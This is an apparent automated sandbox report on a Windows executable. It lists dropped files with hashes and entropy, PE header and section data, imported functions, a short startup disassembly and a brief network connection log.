                                                                                                                                SHA-512:B3B78E6091DB7D7966BEF7DCE11F432D03E610D1DA47348A5CBE6159F9E72D469BA22338A639AE65D6B97F9C6E99B89C27AEA60C7E32ECC6FC6CB1EF2DB43A46
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):0.13805480534212852
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:in0FO0Evb+ipV+dQ1ipV+dQoJMxKE0VEKJSzVqegNlGQrk9r5n+kAhdMClvntYe:i0FO0ET+SkdoSkdUk3JUMV1OCdx
                                                                                                                                MD5:F3EDCD527093297C9F2118F7D494159E
                                                                                                                                SHA1:EA38F45D2087EC71AA940FA32DA85669DD138681
                                                                                                                                SHA-256:B9E6B4CE29CD13210F3B31CCD461E9192DB971F56C2C450F2A3CB8112A2CC118
                                                                                                                                SHA-512:EA6A6202CF6DA8F1B9B40052C7F084AD111B6E10BB54F8C667EF1DADFC46F0877DBEBC5DB81B3223363D9EF66C3A06FDE815B45B9B85D60B1234D80C2C3B8BF4
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5925357910719065
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Wp8Ph0uRc06WX42nT5+dxbmESkdUk3JUMcStn9LUTCSkdlWeUJCPFOa:Wkh01GnTgdmEtJ3HNhhmezPF
                                                                                                                                MD5:F14564526D9D65D4A9B8FAC09A51B2D3
                                                                                                                                SHA1:01BBCEF6D287CDBACC90335CC1507C1B82CDF5E5
                                                                                                                                SHA-256:8A152211D9E124087E416C0E5AAC83F387EAFF4AB2B87D1E2E4707030261E097
                                                                                                                                SHA-512:876BBB968AF9FF51D09E7FFBCE18F97B60AC8815378F71D1C7B83641F3C41E7EF131E919252E5B8A32037CA13CBAFBCC10C3CC60FA35D3A0F7C79683D692BFFC
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.2424453492119203
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:QOhutM+xFX4VT5UdxbHSkdUk3JUMV1ySkdvT8PFOa:Xhs2TOdHtJ3iWPF
                                                                                                                                MD5:A777CBC8BC95A795A4C5570B27F2C9BC
                                                                                                                                SHA1:F715291B16089C94CCE31EBF83827E2DD05D77AD
                                                                                                                                SHA-256:BDD073EE222E67EF1B821C24B2F2F3DC51362F10399A2F9879A6E86B2A01C8FC
                                                                                                                                SHA-512:FAD149C3230B90D31EC7F8098AB4E6439AF7ED1FF34F5CD7E55DC43998D422123CA57764DEC1D5BD30402F66E5AA38256411995977A38554218A363DAA8B2E7D
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.2434093247088895
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:zfwYhutM+xFX4VT5HddyU3ZbSkdUk3JUMV1ySkdvT8PSOOOyU:zJhs2TLdPZbtJ3iWPVh
                                                                                                                                MD5:B2EE48AA02EEAA41FDA2379868692549
                                                                                                                                SHA1:4DE2A5FD2E706BC8F75D6ABF30CA7F0E4DD863DF
                                                                                                                                SHA-256:8C253263AE421A3256BD538D9C130A4EFEBC2A181A046C4296B9E88C97A532D7
                                                                                                                                SHA-512:8574ACD977435DF745D511E4236E8A26C679E8EFED73F550377100DA36023BA9C65F19541B887C67D7239BF4519296A7477390A119A63D33299612543829E778
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.2424453492119203
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:QOhutM+xFX4VT5UdxbHSkdUk3JUMV1ySkdvT8PFOa:Xhs2TOdHtJ3iWPF
                                                                                                                                MD5:A777CBC8BC95A795A4C5570B27F2C9BC
                                                                                                                                SHA1:F715291B16089C94CCE31EBF83827E2DD05D77AD
                                                                                                                                SHA-256:BDD073EE222E67EF1B821C24B2F2F3DC51362F10399A2F9879A6E86B2A01C8FC
                                                                                                                                SHA-512:FAD149C3230B90D31EC7F8098AB4E6439AF7ED1FF34F5CD7E55DC43998D422123CA57764DEC1D5BD30402F66E5AA38256411995977A38554218A363DAA8B2E7D
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5928706367641958
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:X8Ph0uRc06WX4ynT5xdcU/9c4FrMsSkdUk3JUMcStn9LUfCSkdlWeUJCPUU/9c4:Wh01inTd9xFQstJ3HNhdmezPlx
                                                                                                                                MD5:12A3EBB32F35D82681562081A1E0B552
                                                                                                                                SHA1:8EFCB76C0186A26B09FE4629E72AA49EAA877436
                                                                                                                                SHA-256:B302036FD0EE3AF0B86A991299F5563EF901ED102AC721F27BF2913CD629F324
                                                                                                                                SHA-512:363AC7009784BF3A1ADDE42CAF7B3A12EE3FF4F590E8CAF8D9AD2408678B23CFB4420BBDC7FB778295000DC41002A0FA16717665F9227E4DA738ADC01A4F9597
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.552964942140267
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:M58PhZuRc06WX4ynT5UBRdcU/9c4FqeSkdUk3JUMV1ySkdvT8PUU/9c4:XhZ1inT+B79xFqetJ3iWPlx
                                                                                                                                MD5:CD981F0FFA8D79B2C3FF09B5C2F40132
                                                                                                                                SHA1:62FB8DC445F6EFBF61B95317CBDE92D12CD24FCB
                                                                                                                                SHA-256:98BEBC1D66756B8B11ABED21BD96FCACE5C67FBC166F8249D79F03439FEFB85A
                                                                                                                                SHA-512:EA9E20C943ABA0DB762CDD12058BE20B98DA7E2CB004C52EA0FD8BDE7120691392C2740B34ECB936912BD597E185D280684094998DBAE34FF252BF4C68E58A6C
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):1.271856773729339
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gb8uQM+xFX4hT5W7dcU/9c4FrMsSkdUk3JUMcStn9LUfCSkdlWeUJCPUU/9c4:S8DCT09xFQstJ3HNhdmezPlx
                                                                                                                                MD5:54288EA662C430E7B6DFD153BFD23B46
                                                                                                                                SHA1:722EE92B949C3CCB47381E313AEA702292C9371B
                                                                                                                                SHA-256:1C93E131A3E7FC9AECDC2840A114D86FBBC1628E886C7360C1D3CB445D4FA373
                                                                                                                                SHA-512:FFF0A719718C13803D8ABC152DA6396302F134AC38AD7B367CA4BAB0549A66CD979B58E564DCA98379CBD6B0933735FAE475E86AC7CF4B3C87B2B97E3E842AEB
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3::
                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.5530410401046315
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:QE8PhZuRc06WX42nT5XdxbHSkdUk3JUMV1ySkdvT8PFOa:QbhZ1GnTLdHtJ3iWPF
                                                                                                                                MD5:3D1163A467E285C4E8D5B5A03856F238
                                                                                                                                SHA1:0F2A76B535433B04606DEF277B0A280E4D334FEC
                                                                                                                                SHA-256:2724DC1123A03BC2C60561BF07E4B67D2AC7587A1D62239D7CD7E763F5AC5BC3
                                                                                                                                SHA-512:05866D30DF4877DFEDC64E66734C14C82210D0D9FEE8B82BE73EC7EA90D630EDCA1EAD23351FFCF95AAAB86C37420DE4E452A85EAE6C971A4995A54168926FA0
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32768
                                                                                                                                Entropy (8bit):0.06820104175302094
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO2z3pimXIJcI6Vky6lZ:2F0i8n0itFzDHF2oWZyZ
                                                                                                                                MD5:B8DE8A2ED489753EDFC1D135BB66F49C
                                                                                                                                SHA1:74D127AD612DF21D5DB49FA5C13AC42AFDED7758
                                                                                                                                SHA-256:A335DC1C8D02F4AEB76FB20B7C8F7667EDC92BE9F0F81581F1C36B71435D7258
                                                                                                                                SHA-512:2A67B3DDF5AE0E8D9682E150EDC34428C7BBD6FDE56F22454ABD949762DD26EF694F58CA6E7ECD2C56BBC1D8AB53E06C3FF293408715AB221060E4A3D40FAEE4
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                Entropy (8bit):7.996894451965197
                                                                                                                                TrID:
                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:3Af7PybsUi.exe
                                                                                                                                File size:20'072'422 bytes
                                                                                                                                MD5:e5538b58a077cf3e5d621294aa04beca
                                                                                                                                SHA1:3e6165f27b75dcec74262ce522afcfaa2b6b9f8a
                                                                                                                                SHA256:2d92a12de1e6455ce4371765e03f1e6a74aa4f16a348bb23289cecfb7307edd5
                                                                                                                                SHA512:4f22543f044f6ffb098bae9049b2d4ba5a91113bb78e45ce2224a73bc553031ac46f5611727c8ebbf2dddaedf2dc2464d90d26a995bf05f270369b915596dfdb
                                                                                                                                SSDEEP:393216:GbEkZQ8XAcgIdL01+l+uq+Vvz1+TtIiFo0VTp6w6bjEBF:GbhQcTR01+l+uqgvz1QtImowUEn
                                                                                                                                TLSH:D1173351625208B5E2C635361531DF2646B2EC454730FAEF63FD22A42FE7690AE36F32
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..
                                                                                                                                Icon Hash:4a464cd47461e179
                                                                                                                                Entrypoint:0x14000c0d0
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x140000000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x66A70FE3 [Mon Jul 29 03:43:31 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:6
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:6
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:6
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:456e8615ad4320c9f54e50319a19df9c
                                                                                                                                Instruction
                                                                                                                                dec eax
                                                                                                                                sub esp, 28h
                                                                                                                                call 00007F21A44C90FCh
                                                                                                                                dec eax
                                                                                                                                add esp, 28h
                                                                                                                                jmp 00007F21A44C8D1Fh
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                dec eax
                                                                                                                                sub esp, 28h
                                                                                                                                call 00007F21A44C94C8h
                                                                                                                                test eax, eax
                                                                                                                                je 00007F21A44C8EC3h
                                                                                                                                dec eax
                                                                                                                                mov eax, dword ptr [00000030h]
                                                                                                                                dec eax
                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                jmp 00007F21A44C8EA7h
                                                                                                                                dec eax
                                                                                                                                cmp ecx, eax
                                                                                                                                je 00007F21A44C8EB6h
                                                                                                                                xor eax, eax
                                                                                                                                dec eax
                                                                                                                                cmpxchg dword ptr [0003843Ch], ecx
                                                                                                                                jne 00007F21A44C8E90h
                                                                                                                                xor al, al
                                                                                                                                dec eax
                                                                                                                                add esp, 28h
                                                                                                                                ret
                                                                                                                                mov al, 01h
                                                                                                                                jmp 00007F21A44C8E99h
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                dec eax
                                                                                                                                sub esp, 28h
                                                                                                                                test ecx, ecx
                                                                                                                                jne 00007F21A44C8EA9h
                                                                                                                                mov byte ptr [00038425h], 00000001h
                                                                                                                                call 00007F21A44C85F5h
                                                                                                                                call 00007F21A44C98E0h
                                                                                                                                test al, al
                                                                                                                                jne 00007F21A44C8EA6h
                                                                                                                                xor al, al
                                                                                                                                jmp 00007F21A44C8EB6h
                                                                                                                                call 00007F21A44D63EFh
                                                                                                                                test al, al
                                                                                                                                jne 00007F21A44C8EABh
                                                                                                                                xor ecx, ecx
                                                                                                                                call 00007F21A44C98F0h
                                                                                                                                jmp 00007F21A44C8E8Ch
                                                                                                                                mov al, 01h
                                                                                                                                dec eax
                                                                                                                                add esp, 28h
                                                                                                                                ret
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                inc eax
                                                                                                                                push ebx
                                                                                                                                dec eax
                                                                                                                                sub esp, 20h
                                                                                                                                cmp byte ptr [000383ECh], 00000000h
                                                                                                                                mov ebx, ecx
                                                                                                                                jne 00007F21A44C8F09h
                                                                                                                                cmp ecx, 01h
                                                                                                                                jnbe 00007F21A44C8F0Ch
                                                                                                                                call 00007F21A44C943Eh
                                                                                                                                test eax, eax
                                                                                                                                je 00007F21A44C8ECAh
                                                                                                                                test ebx, ebx
                                                                                                                                jne 00007F21A44C8EC6h
                                                                                                                                dec eax
                                                                                                                                lea ecx, dword ptr [000383D6h]
                                                                                                                                call 00007F21A44D61E2h
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3c76c0x78.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000xf424.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x2208.pdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x590000x768.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x39dc00x1c.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39c800x140.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x450.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x292100x29400aca64598002ecff9eefbc96554edf015False0.5511067708333334data6.4784482217419175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x2b0000x126420x128003f5648dac1247df94c41de5e9d46f68eFalse0.5245460304054054data5.750862918403278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x3e0000x73d80xe00d0a288978c66419b180b35f625b6dce7False0.13532366071428573data1.8378139998458343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .pdata0x460000x22080x240074cf3ea22e0a1756984435d6f80f7da5False0.4671223958333333data5.259201915045256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x490000xf4240xf6001fd7a4fb4257aff8bba7e18919bb5476False0.8031631097560976data7.555039935801523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x590000x7680x80071de9271648326ec88350e903470cf3eFalse0.5576171875data5.283119454571673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0x492080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.585820895522388
                                                                                                                                RT_ICON0x4a0b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7360108303249098
                                                                                                                                RT_ICON0x4a9580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.755057803468208
                                                                                                                                RT_ICON0x4aec00x952cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9975384937676757
                                                                                                                                RT_ICON0x543ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3887966804979253
                                                                                                                                RT_ICON0x569940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.49530956848030017
                                                                                                                                RT_ICON0x57a3c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7207446808510638
                                                                                                                                RT_GROUP_ICON0x57ea40x68data0.7019230769230769
                                                                                                                                RT_MANIFEST0x57f0c0x518XML 1.0 document, ASCII text0.4700920245398773
                                                                                                                                DLLImport
                                                                                                                                USER32.dllCreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                COMCTL32.dll
                                                                                                                                KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 14, 2024 08:06:49.249862909 CEST49715443192.168.2.7151.101.0.223
                                                                                                                                Oct 14, 2024 08:06:49.249883890 CEST44349715151.101.0.223192.168.2.7
                                                                                                                                Oct 14, 2024 08:06:49.249939919 CEST49715443192.168.2.7151.101.0.223
                                                                                                                                Oct 14, 2024 08:06:49.259856939 CEST49715443192.168.2.7151.101.0.223
                                                                                                                                Oct 14, 2024 08:06:49.259869099 CEST44349715151.101.0.223192.168.2.7
                                                                                                                                Oct 14, 2024 08:06:49.734930992 CEST44349715151.101.0.223192.168.2.7
                                                                                                                                Oct 14, 2024 08:06:49.735012054 CEST49715443192.168.2.7151.101.0.223
